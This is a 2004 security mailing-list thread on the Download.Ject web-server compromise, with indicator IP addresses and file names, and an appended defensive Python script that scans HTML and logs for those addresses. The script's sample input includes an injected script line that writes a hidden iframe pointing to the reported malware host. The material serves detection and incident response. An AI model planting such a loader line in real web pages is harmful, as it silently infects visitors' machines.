Educause Security Discussion mailing list archives
Re: malware in images
From: Kathy Bergsma <kathya () NERSP NERDC UFL EDU>
Date: Thu, 24 Jun 2004 12:45:44 -0400
In addition to 217.107.218.147, we detected similar exploits from the following addresses.

64.46.100.96
65.254.51.42
66.98.190.22
67.15.42.34
67.18.79.20
69.50.170.214
69.93.54.158
81.211.105.24
195.208.235.66
207.150.192.12
213.159.117.131

=============
Kathy Bergsma
UF Information Security Manager
352-392-2061

On Thu, 24 Jun 2004, Doug Pearson wrote:
There's a bunch of folks scrambling at AV vendors, US-CERT, etc. to figure this one out. Some snippets of information include:

- A large number of web servers were compromised with the malware, including many prominent sites. Those are being cleaned up as identified. The "RFI - Russians IIS Hacks?" described at http://isc.sans.org/diary.php appears to be related to this.

- The URL (reported below) varies its response according to the User-Agent string. From Mozilla or wget you get a broken link. If the User-Agent string is IE's, you get new.html, which is a variation on the recent 0day using the redirection injection bug and JavaScript loaders.

- Unconfirmed, but -possible- indication of infection is the files Jjjknk32.exe, Edhmifcj.dll, and surf.dat in the /windows/system32 directory.

It appears that the site/URL listed below is still active. Highly recommend blocking at your network border.

Regards,
Doug Pearson
Research and Education Networking ISAC
http://www.ren-isac.net
Watch Desk 24x7: +1(317)278-6630

-----

At 10:32 PM 6/23/2004 -0500, Doug Pearson wrote:

There's *early* report of lots of sites infected with images that contain malware. The JavaScript appended to the images reaches back to "http: // 217.107.218.147/ dot.php" to get the next dose of malware. The embedded spaces in the URL are mine to prevent accidental launches.

I'm running a current Symantec AV on my desktop. SAV catches what's at the URL as:

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Download.Ject
File: [obfuscated by Doug P]new[1].htm
[and so forth...]

Sites may wish to apply local network filters to block 217.107.218.147!

Regards,
Doug Pearson
Research and Education Networking ISAC
http://www.ren-isac.net
Watch Desk 24x7: +1(317)278-6630

**********
Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
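The thread above gives two things a site can act on right away: the callback address Doug Pearson reported and the additional addresses Kathy Bergsma listed. The following checker is an added example, not code from either poster or from the list; it scans served HTML for script blocks that reference any of those addresses (the appended loader the thread describes) and flags web or proxy log lines in which a client has already fetched from them. The HTML snippet and log lines it runs on are constructed for illustration and are not captured data; the zero-size iframe in the sample is an assumed shape of the loader, not one the thread documents.

```python
"""
Offline checker for the addresses reported in the "malware in images" thread.
Added example, not part of the original mailing-list posts.
"""
import re

# Addresses reported in the thread: Doug Pearson's 217.107.218.147 plus the
# additional ones Kathy Bergsma listed.
REPORTED_ADDRESSES = {
    "217.107.218.147",
    "64.46.100.96", "65.254.51.42", "66.98.190.22", "67.15.42.34",
    "67.18.79.20", "69.50.170.214", "69.93.54.158", "81.211.105.24",
    "195.208.235.66", "207.150.192.12", "213.159.117.131",
}

# IPv4 literals not embedded in a longer dotted/numeric run; the exact set
# lookup afterwards rejects near-misses such as 217.107.218.148.
_IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# <script ...>...</script> blocks, case-insensitive, may span lines.
_SCRIPT = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def find_reported_addresses(text):
    """Return the sorted list of reported addresses that appear in text."""
    return sorted({ip for ip in _IPV4.findall(text) if ip in REPORTED_ADDRESSES})


def suspicious_scripts(html):
    """Return the script blocks in html that reference a reported address.

    Covers both a src="http://<addr>/..." loader and inline code that
    writes the URL itself, since the match is on the block's full text.
    """
    return [s for s in _SCRIPT.findall(html) if find_reported_addresses(s)]


def flag_log_lines(lines):
    """Yield (line_number, addresses) for log lines mentioning a reported address."""
    for n, line in enumerate(lines, 1):
        hits = find_reported_addresses(line)
        if hits:
            yield n, hits


# --- constructed sample input (illustrative, not real captured data) ------
SAMPLE_HTML = """<html><body>
<img src="/images/banner.gif">
<script type="text/javascript" src="/js/site.js"></script>
<script>document.write('<iframe src="http://217.107.218.147/dot.php" width=0 height=0></iframe>');</script>
</body></html>"""

SAMPLE_LOG = [
    '10.1.2.3 - - [24/Jun/2004:12:01:05 -0400] "GET /images/banner.gif HTTP/1.1" 200 5120',
    '10.1.2.3 - - [24/Jun/2004:12:01:06 -0400] "GET http://217.107.218.147/dot.php HTTP/1.1" 200 812',
    '10.1.2.9 - - [24/Jun/2004:12:02:11 -0400] "GET http://66.98.190.22/new.html HTTP/1.1" 200 2048',
    '10.1.2.7 - - [24/Jun/2004:12:03:40 -0400] "GET http://217.107.218.148/x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for s in suspicious_scripts(SAMPLE_HTML):
        print("injected script block:", s[:80])
    for n, hits in flag_log_lines(SAMPLE_LOG):
        print("log line %d references %s" % (n, ", ".join(hits)))
```

Run it against copies of your own document root and the last day of proxy logs; a hit in the HTML means the server itself is serving the loader, a hit in the logs means a client has already followed it and warrants a look for the system32 files Doug lists as a possible indicator. Exact-set matching rather than a loose substring search keeps neighbouring addresses from producing false positives once the list is extended.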
Current thread:
- malware in images Doug Pearson (Jun 23)
- <Possible follow-ups>
- Re: malware in images Doug Pearson (Jun 24)
- Re: malware in images Kathy Bergsma (Jun 24)
- Re: malware in images Brian Eckman (Jun 24)
- Re: malware in images Jordan Wiens (Jun 24)
- Re: malware in images Jeff Kell (Jun 24)